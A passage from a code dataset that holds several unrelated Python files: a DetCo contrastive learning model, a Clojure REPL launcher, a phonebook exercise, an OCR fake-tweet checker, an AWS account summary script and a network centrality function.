nn.functional.normalize(self.encoder_k_patch_necks[1](torch.cat(temp(p_k_3), dim=0))[0], dim=1)\n k_l_4 = nn.functional.normalize(self.encoder_k_patch_necks[2](torch.cat(temp(p_k_4), dim=0))[0], dim=1)\n k_l_5 = nn.functional.normalize(self.encoder_k_patch_necks[3](torch.cat(temp(p_k_5), dim=0))[0], dim=1)\n \"\"\"k_l_2 = nn.functional.normalize(\n self.encoder_k_patch_necks[0](p_k_2.view(-1, 9 * p_k_2.size(1), p_k_2.size(2), p_k_2.size(3)))[0], dim=1)\n k_l_3 = nn.functional.normalize(\n self.encoder_k_patch_necks[1](p_k_3.view(-1, 9 * p_k_3.size(1), p_k_3.size(2), p_k_3.size(3)))[0], dim=1)\n k_l_4 = nn.functional.normalize(\n self.encoder_k_patch_necks[2](p_k_4.view(-1, 9 * p_k_4.size(1), p_k_4.size(2), p_k_4.size(3)))[0], dim=1)\n k_l_5 = nn.functional.normalize(\n self.encoder_k_patch_necks[3](p_k_5.view(-1, 9 * p_k_5.size(1), p_k_5.size(2), p_k_5.size(3)))[0], dim=1)\"\"\"\n\n # undo shuffle\n # k, p_k = self._batch_unshuffle_ddp(k, p_k, idx_unshuffle)\n k_2, p_k_2 = self._batch_unshuffle_ddp(k_2, p_k_2, idx_unshuffle)\n k_3, p_k_3 = self._batch_unshuffle_ddp(k_3, p_k_3, idx_unshuffle)\n k_4, p_k_4 = self._batch_unshuffle_ddp(k_4, p_k_4, idx_unshuffle)\n k_5, p_k_5 = self._batch_unshuffle_ddp(k_5, p_k_5, idx_unshuffle)\n\n q_l = [q_l_2, q_l_3, q_l_4, q_l_5]\n q = [q_2, q_3, q_4, q_5]\n k_l = [k_l_2, k_l_3, k_l_4, k_l_5]\n k = [k_2, k_3, k_4, k_5]\n\n # compute logits\n # Einstein sum is more intuitive\n queue_l = [self.local_queue_2, self.local_queue_3, self.local_queue_4, self.local_queue_5]\n queue_g = [self.queue_2, self.queue_3, self.queue_4, self.queue_5]\n\n gg_pos, gg_neg = self.compute_logits(q, k, queue_g)\n gl_pos, gl_neg = self.compute_logits(q_l, k, queue_g)\n ll_pos, ll_neg = self.compute_logits(q_l, k_l, queue_l)\n\n losses = self.head(gg_pos, gg_neg, gl_pos, gl_neg, ll_pos, ll_neg)\n self._dequeue_and_enqueue(k_2, k_3, k_4, k_5, k_l_2, k_l_3, k_l_4, k_l_5)\n\n return losses\n\n def compute_logits(self, q, k, queue):\n # positive logits: Nx1\n pos_2 = torch.einsum('nc,nc->n', [q[0], k[0]]).unsqueeze(-1)\n pos_3 = torch.einsum('nc,nc->n', [q[1], k[1]]).unsqueeze(-1)\n pos_4 = torch.einsum('nc,nc->n', [q[2], k[2]]).unsqueeze(-1)\n pos_5 = torch.einsum('nc,nc->n', [q[3], k[3]]).unsqueeze(-1)\n # negative logits: NxK\n neg_2 = torch.einsum('nc,ck->nk', [q[0], queue[0].clone().detach()])\n neg_3 = torch.einsum('nc,ck->nk', [q[1], queue[1].clone().detach()])\n neg_4 = torch.einsum('nc,ck->nk', [q[2], queue[2].clone().detach()])\n neg_5 = 
torch.einsum('nc,ck->nk', [q[3], queue[3].clone().detach()])\n\n return [pos_2, pos_3, pos_4, pos_5], [neg_2, neg_3, neg_4, neg_5]\n\n def forward_test(self, img, **kwargs):\n pass\n\n def forward(self, img, patch, mode='train', **kwargs):\n if mode == 'train':\n return self.forward_train(img, patch, **kwargs)\n elif mode == 'test':\n return self.forward_test(img, **kwargs)\n elif mode == 'extract':\n return self.backbone_q(img)\n else:\n raise Exception(\"No such mode: {}\".format(mode))\n\n\n# utils\n@torch.no_grad()\ndef concat_all_gather(tensor):\n \"\"\"\n Performs all_gather operation on the provided tensors.\n *** Warning ***: torch.distributed.all_gather has no gradient.\n \"\"\"\n tensors_gather = [\n torch.ones_like(tensor)\n for _ in range(torch.distributed.get_world_size())\n ]\n torch.distributed.all_gather(tensors_gather, tensor, async_op=False)\n\n output = torch.cat(tensors_gather, dim=0)\n return output\n","repo_name":"Qianna00/openselfsup","sub_path":"openselfsup/models/detco.py","file_name":"detco.py","file_ext":"py","file_size_in_byte":16784,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"70267708000","text":"#! /usr/bin/env python3\nimport argparse, build_utils, common, os, platform, subprocess, sys\n\ndef main():\n os.chdir(common.basedir)\n classpath = common.deps() + [\n \"dev\",\n \"test\",\n build_utils.fetch_maven(\"org.clojure\", \"tools.namespace\", build_utils.deps_version(\"tools.namespace\")),\n build_utils.fetch_maven(\"org.clojure\", \"java.classpath\", \"1.0.0\"),\n build_utils.fetch_maven(\"org.clojure\", \"tools.reader\", \"1.3.6\"),\n build_utils.fetch_maven(\"criterium\", \"criterium\", build_utils.deps_version(\"criterium\"), repo = common.clojars),\n build_utils.fetch_maven(\"com.clojure-goes-fast\", \"clj-async-profiler\", build_utils.deps_version(\"clj-async-profiler\"), repo = common.clojars),\n ]\n \n parser = argparse.ArgumentParser()\n parser.add_argument('--ns', default='examples')\n (args, _) = parser.parse_known_args()\n\n return subprocess.call([\"java\",\n \"--class-path\", build_utils.classpath_join(classpath),\n \"-ea\",\n \"-Djdk.attach.allowAttachSelf\",\n # \"-XX:+UnlockDiagnosticVMOptions\",\n # \"-XX:+DebugNonSafepoints\",\n \"clojure.main\", \"-m\", \"user\", \"--ns\", args.ns])\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"HumbleUI/HumbleUI","sub_path":"script/repl.py","file_name":"repl.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","stars":928,"dataset":"github-code","pt":"51"} +{"seq_id":"41104691533","text":"nums = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '0']\ndictionary = {}\ndata = input()\nwhile data not in nums:\n name, phone = data.split('-')\n dictionary[name] = phone\n data = input()\nlast_data = data\n\nfor _ in range(int(last_data)):\n name=input()\n if name in dictionary:\n print(f\"{name} -> {dictionary[name]}\")\n else:\n print(f\"Contact {name} does not exist.\")","repo_name":"simeon1534/Python-Advanced","sub_path":"tuples_sets_exercises/phonebook2.py","file_name":"phonebook2.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"3953843894","text":"import pytesseract\nfrom PIL import Image\nimport argparse\n\nimport re\n\nimport twitter_manager\n\ntweeter_handle_regex = re.compile('(?<=^|(?<=[^a-zA-Z0-9-_\\.]))@([A-Za-z]+[A-Za-z0-9]+)')\n\n\ndef 
get_text_from_image(image_path):\n\ttext = pytesseract.image_to_string(Image.open(image_path))\n\t# print(text)\n\treturn text\n\n\ndef get_tweet_handles(text):\n\ttweeter_handles = tweeter_handle_regex.findall(text)\n\treturn tweeter_handles\n\n\ndef get_handle_tweet_pair(chunks):\n\tpairs = []\n\n\tfor i in range(len(chunks)):\n\t\thandles = tweeter_handle_regex.findall(chunks[i])\n\t\tif handles == []:\n\t\t\thandle = None\n\t\telse:\n\t\t\thandle = handles[0]\n\t\t# guard against a handle in the last chunk, which has no following tweet text\n\t\tif handle is not None and i + 1 < len(chunks):\n\t\t\ttweet = chunks[i+1].replace('\\n', ' ')\n\t\t\tpairs.append((handle, tweet))\n\n\tprint(pairs)\n\treturn pairs\n\n\ndef get_chunks(text):\n\ttext = text.strip()\n\tchunks = text.strip().split('\\n\\n')\n\tfor chunk in chunks:\n\t\tif tweeter_handle_regex.findall(chunk) == []:\n\t\t\tchunks = chunks[1:]\n\t\telse:\n\t\t\tbreak\n\treturn chunks\n\t\n\ndef check_if_fake_tweet(image_path):\n\ttext = get_text_from_image(image_path)\n\tchunks = get_chunks(text)\n\thandle_tweet_pairs = get_handle_tweet_pair(chunks)\n\n\tfor pair in handle_tweet_pairs:\n\t\thandle, tweet = pair\n\t\tprint(u\"Searching for \\n {}: {}\".format(handle, tweet))\n\t\turl = twitter_manager.search_tweet(handle, tweet)\n\t\tif url is not None:\n\t\t\tprint(url)\n\t\telse:\n\t\t\tprint(\"NOT FOUND, you may wish to check manually!\")\n\n\nif __name__ == '__main__':\n\tap = argparse.ArgumentParser()\n\tap.add_argument(\"-i\", \"--image\", required=True, help=\"path to tweet image to be OCR'd\")\n\targs = vars(ap.parse_args())\n\n\timage_path = args['image']\n\n\tcheck_if_fake_tweet(image_path)","repo_name":"priyankpalod/did_they_tweet_this","sub_path":"tweet_detector.py","file_name":"tweet_detector.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"74224086558","text":"import boto3\n\n\ndef get_aws_account_info():\n    # Create an IAM client\n    iam_client = boto3.client(\"iam\")\n    response = iam_client.get_account_summary()\n    print(response)\n    try:\n        # Get information about the AWS account\n        response = iam_client.get_account_summary()\n\n        # Print relevant information (SummaryMap maps the summary keys directly;\n        # the account name is not part of the summary, so the alias is fetched\n        # via list_account_aliases instead)\n        account_mfa_enabled = response[\"SummaryMap\"][\"AccountMFAEnabled\"]\n        aliases = iam_client.list_account_aliases()[\"AccountAliases\"]\n        account_alias = aliases[0] if aliases else \"(no alias set)\"\n\n        print(f\"AWS Account MFA enabled: {account_mfa_enabled}\")\n        print(f\"AWS Account alias: {account_alias}\")\n\n    except Exception as e:\n        print(f\"Error: {e}\")\n\n\nif __name__ == \"__main__\":\n    # Get information about the AWS account\n    get_aws_account_info()\n","repo_name":"mezni/work02","sub_path":"old/test/get_account.py","file_name":"get_account.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"39713810811","text":"import numpy\n\n# Change as necessary\n#myfile = \"examples/mixedtie.csv\"\n#myfile = \"examples/triad.csv\"\n#myfile = \"examples/mostextreme.csv\"\n#myfile = \"examples/mostextreme_rivals.csv\"\n#myfile = \"examples/Level1Clusters_Active_Size_2_1_Inf_2_2_P_0.01_InnerSortedCorrelations.csv\"\n#myfile = \"examples/COPD.pvalued.csv\"\n#myfile = \"examples/Never/Never_9A/Never.pvalued.csv\"\n#myfile = \"examples/Social_networks/Karate/karate.csv\"\n\n#f = open(myfile, 'r')\n\n# Get the first line (names)\n#firstline = f.readline()\n#bacteria = firstline.split(',')\n#bacteria.remove('\\\"\\\"')\n\ndef pncentrality(bacteria, G):\n    n = len(bacteria)\n    m = numpy.zeros([n, n])\n    bacteria[len(bacteria)-1] = 
bacteria[len(bacteria)-1].strip()\n for key in G.adj:\n for key2 in G.adj[key]:\n # TMC need to fix this, breaks for either CSV or GML\n if (bacteria[0].count(\"\\\"\") == 0):\n index1 = bacteria.index(key)\n index2 = bacteria.index(key2)\n else:\n index1 = bacteria.index(\"\\\"\"+key+\"\\\"\")\n index2 = bacteria.index(\"\\\"\"+key2+\"\\\"\")\n w = G.adj[key][key2]['weight']\n m[index1][index2] = w\n m[index2][index1] = w\n # Make the identity matrix I\n # and the adjacency matrix A\n # and the positive matrix P\n # and the negative matrix N\n #m = []\n p = []\n nv = []\n z = []\n for i in range(n):\n #mc = []\n zc = []\n pc = []\n nc = []\n #contents = line.split(',')\n for j in range(n):\n value = float(m[i][j])\n #mc.append(value)\n zc.append(0)\n if (value > 0):\n pc.append(value)\n nc.append(0)\n else:\n pc.append(0)\n nc.append(-value)\n #m.append(mc)\n z.append(zc)\n p.append(pc)\n nv.append(nc)\n\n # Check to make sure all entries (i, i) are 0\n for i in range(n):\n m[i][i] = 0\n p[i][i] = 0\n nv[i][i] = 0\n\n # Added TMC December 23, 2014\n onemat = []\n for i in range(n):\n omc = []\n for j in range(n):\n omc.append(1)\n onemat.append(omc)\n OneMatrix = numpy.matrix(onemat) \n\n\n ADJ = numpy.matrix(m)\n P = numpy.matrix(p)\n N = numpy.matrix(nv)\n #A = P - 2*N\n\n A = P - 2*N\n\n for i in range(n):\n z[i][i] = 1\n I = numpy.matrix(z)\n\n # Make the vector of ones\n Ones = []\n for i in range(n):\n Ones.append([1])\n O = numpy.matrix(Ones)\n\n # Compute hStar (traditional centrality)\n PN = ((I - (1.0/(2*n-2))*A).getI()) * O\n\n arr = PN.getA()\n retval = []\n for i in range(n):\n retval.append(arr[i][0])\n return retval\n #tuples = []\n #for i in range(n):\n # tuples.append([arr[i][0], bacteria[i].strip()])\n\n #tuples.sort()\n #tuples.reverse()\n #from tabulate import tabulate\n","repo_name":"movingpictures83/MATria","sub_path":"PNcentrality.py","file_name":"PNcentrality.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}